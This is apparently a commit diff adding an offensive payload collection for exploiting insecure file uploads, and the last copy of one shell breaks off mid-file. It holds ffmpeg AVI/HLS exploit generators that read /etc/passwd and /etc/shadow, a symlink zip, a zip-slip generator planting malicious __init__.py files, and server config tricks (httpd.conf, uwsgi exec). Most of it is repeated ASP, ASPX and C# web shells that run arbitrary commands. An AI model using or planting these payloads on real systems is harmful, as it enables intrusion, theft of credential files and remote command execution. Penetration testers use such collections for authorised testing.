Deployed 55afcb1 with MkDocs version: 1.5.3

2025-10-29 16:57:02 +00:00 · 2024-03-30 12:22:06 +00:00
commit 76f281cc93
454 changed files with 788469 additions and 0 deletions
--- a/HLS/gen_avi_bypass.py
+++ b/HLS/gen_avi_bypass.py
@@ -0,0 +1,38 @@
+import struct
+import argparse
+
+AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST    movi"
+
+
+def make_txt_packet(content, fake_packets=50, fake_packet_len=200):
+    content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content
+    packet = b'00tx' + struct.pack('<I', len(content)) + content
+    dcpkt = b'00dc' + struct.pack('<I', fake_packet_len) + b'\x00' * fake_packet_len
+    return packet + dcpkt * fake_packets
+
+TXT_PLAYLIST = """#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:1.0,
+#EXT-X-BYTERANGE: 0
+{txt}
+#EXTINF:1.0,
+{file}
+#EXT-X-ENDLIST"""
+
+def prepare_txt_packet(txt, filename):
+    return make_txt_packet(TXT_PLAYLIST.format(txt=txt, file=filename).encode())
+
+# TXT_LIST = ['/usr/share/doc/gnupg/Upgrading_From_PGP.txt', '/usr/share/doc/mount/mount.txt', '/etc/pki/nssdb/pkcs11.txt', '/usr/share/gnupg/help.txt']
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser('HLS AVI TXT exploit generator')
+    parser.add_argument('filename', help='file that should be read from convertion instance')
+    parser.add_argument('output_avi', help='where to save the avi')
+    parser.add_argument('--txt', help='any .txt file that exist on target system', default='GOD.txt')
+    args = parser.parse_args()
+    avi = AVI_HEADER + prepare_txt_packet(args.txt, args.filename)
+    output_name = args.output_avi
+
+    with open(output_name, 'wb') as f:
+        f.write(avi)
+
--- a/HLS/gen_xbin_avi.py
+++ b/HLS/gen_xbin_avi.py
@@ -0,0 +1,154 @@
+#!/usr/bin/env python3
+from builtins import bytes
+from builtins import map
+from builtins import zip
+from builtins import range
+import struct
+import argparse
+import random
+import string
+
+AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST    movi"
+
+ECHO_TEMPLATE = """### echoing {needed!r}
+#EXT-X-KEY: METHOD=AES-128, URI=/dev/zero, IV=0x{iv}
+#EXTINF:1,
+#EXT-X-BYTERANGE: 16
+/dev/zero
+#EXT-X-KEY: METHOD=NONE
+"""
+
+# AES.new('\x00'*16).decrypt('\x00'*16)
+GAMMA = b'\x14\x0f\x0f\x10\x11\xb5"=yXw\x17\xff\xd9\xec:'
+
+FULL_PLAYLIST = """#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+{content}
+#### random string to prevent caching: {rand}
+#EXT-X-ENDLIST"""
+
+EXTERNAL_REFERENCE_PLAYLIST = """
+
+####  External reference: reading {size} bytes from {filename} (offset {offset})
+#EXTINF:1,
+#EXT-X-BYTERANGE: {size}@{offset}
+{filename}
+
+
+"""
+
+XBIN_HEADER = b'XBIN\x1A\x20\x00\x0f\x00\x10\x04\x01\x00\x00\x00\x00'
+
+
+def echo_block(block):
+    assert len(block) == 16
+    iv = ''.join(map('{:02x}'.format, [x ^ y for (x, y) in zip(block, GAMMA)]))
+    return ECHO_TEMPLATE.format(needed=block, iv=iv)
+
+
+def gen_xbin_sync():
+    seq = []
+    for i in range(60):
+        if i % 2:
+            seq.append(0)
+        else:
+            seq.append(128 + 64 - i - 1)
+    for i in range(4, 0, -1):
+        seq.append(128 + i - 1)
+    seq.append(0)
+    seq.append(0)
+    for i in range(12, 0, -1):
+        seq.append(128 + i - 1)
+    seq.append(0)
+    seq.append(0)
+    return seq
+
+
+def test_xbin_sync(seq):
+    for start_ind in range(64):
+        path = [start_ind]
+        cur_ind = start_ind
+        while cur_ind < len(seq):
+            if seq[cur_ind] == 0:
+                cur_ind += 3
+            else:
+                assert seq[cur_ind] & (64 + 128) == 128
+                cur_ind += (seq[cur_ind] & 63) + 3
+            path.append(cur_ind)
+        assert cur_ind == len(seq), "problem for path {}".format(path)
+
+
+def echo_seq(s):
+    assert len(s) % 16 == 0
+    res = []
+    for i in range(0, len(s), 16):
+        res.append(echo_block(s[i:i + 16]))
+    return ''.join(res)
+
+
+test_xbin_sync(gen_xbin_sync())
+
+SYNC = echo_seq(gen_xbin_sync())
+
+
+def make_playlist_avi(playlist, fake_packets=1000, fake_packet_len=3):
+    content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + playlist.encode('ascii')
+    packet = b'00tx' + struct.pack('<I', len(content)) + content
+    dcpkt = b'00dc' + struct.pack('<I',
+                                  fake_packet_len) + b'\x00' * fake_packet_len
+    return AVI_HEADER + packet + dcpkt * fake_packets
+
+
+def gen_xbin_packet_header(size):
+    return bytes([0] * 9 + [1] + [0] * 4 + [128 + size - 1, 10])
+
+
+def gen_xbin_packet_playlist(filename, offset, packet_size):
+    result = []
+    while packet_size > 0:
+        packet_size -= 16
+        assert packet_size > 0
+        part_size = min(packet_size, 64)
+        packet_size -= part_size
+        result.append(echo_block(gen_xbin_packet_header(part_size)))
+        result.append(
+            EXTERNAL_REFERENCE_PLAYLIST.format(
+                size=part_size,
+                offset=offset,
+                filename=filename))
+        offset += part_size
+    return ''.join(result), offset
+
+
+def gen_xbin_playlist(filename_to_read):
+    pls = [echo_block(XBIN_HEADER)]
+    next_delta = 5
+    for max_offs, filename in (
+            (5000, filename_to_read), (500, "file:///dev/zero")):
+        offset = 0
+        while offset < max_offs:
+            for _ in range(10):
+                pls_part, new_offset = gen_xbin_packet_playlist(
+                    filename, offset, 0xf0 - next_delta)
+                pls.append(pls_part)
+                next_delta = 0
+            offset = new_offset
+        pls.append(SYNC)
+    return FULL_PLAYLIST.format(content=''.join(pls), rand=''.join(
+        random.choice(string.ascii_lowercase) for i in range(30)))
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser('AVI+M3U+XBIN ffmpeg exploit generator')
+    parser.add_argument(
+        'filename',
+        help='filename to be read from the server (prefix it with "file://")')
+    parser.add_argument('output_avi', help='where to save the avi')
+    args = parser.parse_args()
+    assert '://' in args.filename, "ffmpeg needs explicit proto (forgot file://?)"
+    content = gen_xbin_playlist(args.filename)
+    avi = make_playlist_avi(content)
+    output_name = args.output_avi
+
+    with open(output_name, 'wb') as f:
+        f.write(avi)
--- a/HLS/index.html
+++ b/HLS/index.html
--- a/HLS/read_passwd.avi
+++ b/HLS/read_passwd.avi
--- a/HLS/read_passwd_bypass.mp4
+++ b/HLS/read_passwd_bypass.mp4
--- a/HLS/read_shadow.avi
+++ b/HLS/read_shadow.avi
--- a/HLS/read_shadow_bypass.mp4
+++ b/HLS/read_shadow_bypass.mp4
--- a/Link/etc_passwd.zip
+++ b/Link/etc_passwd.zip
--- a/Link/generate.sh
+++ b/Link/generate.sh
@@ -0,0 +1,2 @@
+ln -s /etc/passwd link
+zip --symlinks test.zip link
--- a/Link/passwd
+++ b/Link/passwd
@@ -0,0 +1 @@
+/etc/passwd
--- a/.htaccess/index.html
+++ b/.htaccess/index.html
--- a/httpd.conf/httpd.conf
+++ b/httpd.conf/httpd.conf
@@ -0,0 +1 @@
+*.sh:/bin/sh
--- a/httpd.conf/index.html
+++ b/httpd.conf/index.html
--- a/httpd.conf/shellymcshellface.sh
+++ b/httpd.conf/shellymcshellface.sh
@@ -0,0 +1,3 @@
+echo "Content-type: text/html"
+echo ""
+echo `id`
--- a/web.config/web.config
+++ b/web.config/web.config
@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<configuration>
+   <system.webServer>
+      <handlers accessPolicy="Read, Script, Write">
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
+      </handlers>
+      <security>
+         <requestFiltering>
+            <fileExtensions>
+               <remove fileExtension=".config" />
+            </fileExtensions>
+            <hiddenSegments>
+               <remove segment="web.config" />
+            </hiddenSegments>
+         </requestFiltering>
+      </security>
+   </system.webServer>
+</configuration>
+<!--
+<% Response.write("-"&"->")%>
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+Function getCommandOutput(theCommand)
+    Dim objShell, objCmdExec
+    Set objShell = CreateObject("WScript.Shell")
+    Set objCmdExec = objshell.exec(thecommand)
+
+    getCommandOutput = objCmdExec.StdOut.ReadAll
+end Function
+%>
+
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<%Response.Write(Request.ServerVariables("server_name"))%>
+<p>
+<b>The server's port:</b>
+<%Response.Write(Request.ServerVariables("server_port"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("server_software"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
+<% szCMD = request("cmd")
+thisDir = getCommandOutput("cmd /c" & szCMD)
+Response.Write(thisDir)%>
+</p>
+<br>
+</BODY>
+
+
+
+<%Response.write("<!-"&"-") %>
+-->
--- a/init.py/python-admin-init.py.zip
+++ b/init.py/python-admin-init.py.zip
--- a/init.py/python-conf-init.py.zip
+++ b/init.py/python-conf-init.py.zip
--- a/init.py/python-config-init.py.zip
+++ b/init.py/python-config-init.py.zip
--- a/init.py/python-controllers-init.py.zip
+++ b/init.py/python-controllers-init.py.zip
--- a/init.py/python-generate-init.py
+++ b/init.py/python-generate-init.py
@@ -0,0 +1,19 @@
+# Generating "evil" zip file
+# Based on the work of Ajin Abraham
+# Vuln website : https://github.com/ajinabraham/bad_python_extract
+# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
+
+# Warning 1: need a restart from the server OR debug=True
+# Warning 2: you won't get the output of the command (blind rce)
+import zipfile
+
+directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
+for d in directories:
+    name = "python-"+d+"-__init__.py.zip"
+    zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
+    zipf.close()
+    z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
+    z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
+    z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
+    z_info.external_attr = 0o777 << 16
+    z_file.close()
--- a/init.py/python-login-init.py.zip
+++ b/init.py/python-login-init.py.zip
--- a/init.py/python-models-init.py.zip
+++ b/init.py/python-models-init.py.zip
--- a/init.py/python-modules-init.py.zip
+++ b/init.py/python-modules-init.py.zip
--- a/init.py/python-scripts-init.py.zip
+++ b/init.py/python-scripts-init.py.zip
--- a/init.py/python-settings-init.py.zip
+++ b/init.py/python-settings-init.py.zip
--- a/init.py/python-tests-init.py.zip
+++ b/init.py/python-tests-init.py.zip
--- a/init.py/python-urls-init.py.zip
+++ b/init.py/python-urls-init.py.zip
--- a/init.py/python-utils-init.py.zip
+++ b/init.py/python-utils-init.py.zip
--- a/init.py/python-view-init.py.zip
+++ b/init.py/python-view-init.py.zip
--- a/uwsgi.ini/index.html
+++ b/uwsgi.ini/index.html
--- a/uwsgi.ini/uwsgi.ini
+++ b/uwsgi.ini/uwsgi.ini
@@ -0,0 +1,13 @@
+[uwsgi]
+; read from a symbol
+foo = @(sym://uwsgi_funny_function)
+; read from binary appended data
+bar = @(data://[REDACTED])
+; read from http
+test = @(http://[REDACTED])
+; read from a file descriptor
+content = @(fd://[REDACTED])
+; read from a process stdout
+body = @(exec://whoami)
+; call a function returning a char *
+characters = @(call://uwsgi_func)
--- a/Files/EICAR/eicar.txt
+++ b/Files/EICAR/eicar.txt
@@ -0,0 +1 @@
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,42 @@
+<% @ webhandler language="C#" class="AverageHandler" %>
+
+using System;
+using System.Web;
+using System.Diagnostics;
+using System.IO;
+
+public class AverageHandler : IHttpHandler
+{
+  /* .Net requires this to be implemented */
+  public bool IsReusable
+  {
+    get { return true; }
+  }
+
+  /* main executing code */
+  public void ProcessRequest(HttpContext ctx)
+  {
+    Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" +   HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
+    string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
+
+    ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'></form>");
+    ctx.Response.Write("<hr>");
+    ctx.Response.Write("<pre>");
+
+    /* command execution and output retrieval */
+    ProcessStartInfo psi = new ProcessStartInfo();
+    psi.FileName = "cmd.exe";
+    psi.Arguments = "/c "+command;
+    psi.RedirectStandardOutput = true;
+    psi.UseShellExecute = false;
+    Process p = Process.Start(psi);
+    StreamReader stmrdr = p.StandardOutput;
+    string s = stmrdr.ReadToEnd();
+    stmrdr.Close();
+
+    ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
+    ctx.Response.Write("</pre>");
+    ctx.Response.Write("<hr>");
+    ctx.Response.Write("By <a href='http://www.twitter.com/Hypn'>@Hypn</a>, for educational purposes only.");
+ }
+}
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,129 @@
+<%@ Page Language="C#"%>
+<%@ Import Namespace="System" %>
+
+<script runat="server">
+
+/* *****************************************************************************
+***
+*** Laudanum Project
+*** A Collection of Injectable Files used during a Penetration Test
+***
+*** More information is available at:
+***  http://laudanum.secureideas.net
+***  laudanum@secureideas.net
+***
+***  Project Leads:
+***         Kevin Johnson <kjohnson@secureideas.net>
+***         Tim Medin <tim@securitywhole.com>
+***
+*** Copyright 2012 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides shell access to the system.
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA  02111-1307, USA.
+***
+***************************************************************************** */
+
+string stdout = "";
+string stderr = "";
+
+void die() {
+	//HttpContext.Current.Response.Clear();
+	HttpContext.Current.Response.StatusCode = 404;
+	HttpContext.Current.Response.StatusDescription = "Not Found";
+	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
+	HttpContext.Current.Server.ClearError();
+	HttpContext.Current.Response.End();
+}
+
+void Page_Load(object sender, System.EventArgs e) {
+
+	// Check for an IP in the range we want
+	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
+	
+	// check if the X-Fordarded-For header exits
+	string remoteIp;
+	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
+		remoteIp = Request.UserHostAddress;
+	} else {
+		remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; 
+	}
+
+	bool validIp = false;
+	foreach (string ip in allowedIps) {
+		validIp = (validIp || (remoteIp == ip));
+	}
+	
+	if (!validIp) {
+		die();
+	}
+	
+	if (Request.Form["c"] != null) {
+	// do or do not, there is no try
+	//try {
+		// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
+		// "/c" tells cmd that we want it to execute the command that follows, and exit.
+		System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
+
+		// The following commands are needed to redirect the standard output and standard error.
+		procStartInfo.RedirectStandardOutput = true;
+		procStartInfo.RedirectStandardError = true;
+		procStartInfo.UseShellExecute = false;
+		// Do not create the black window.
+		procStartInfo.CreateNoWindow = true;
+		// Now we create a process, assign its ProcessStartInfo and start it
+		System.Diagnostics.Process p = new System.Diagnostics.Process();
+		p.StartInfo = procStartInfo;
+		p.Start();
+		// Get the output and error into a string
+		stdout = p.StandardOutput.ReadToEnd();
+		stderr = p.StandardError.ReadToEnd();
+	//}
+	//catch (Exception objException)
+	//{
+	}
+}
+</script>
+<html>
+<head><title>Laundanum ASPX Shell</title></head>
+<body onload="document.shell.c.focus()">
+
+<form method="post" name="shell">
+cmd /c <input type="text" name="c"/>
+<input type="submit"><br/>
+STDOUT:<br/>
+<pre><% = stdout.Replace("<", "&lt;") %></pre>
+<br/>
+<br/>
+<br/>
+STDERR:<br/>
+<pre><% = stderr.Replace("<", "&lt;") %></pre>
+
+
+</form>
+
+  <hr/>
+  <address>
+  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+  Written by Tim Medin.<br/>
+  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+  </address>
+
+</body>
+</html>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
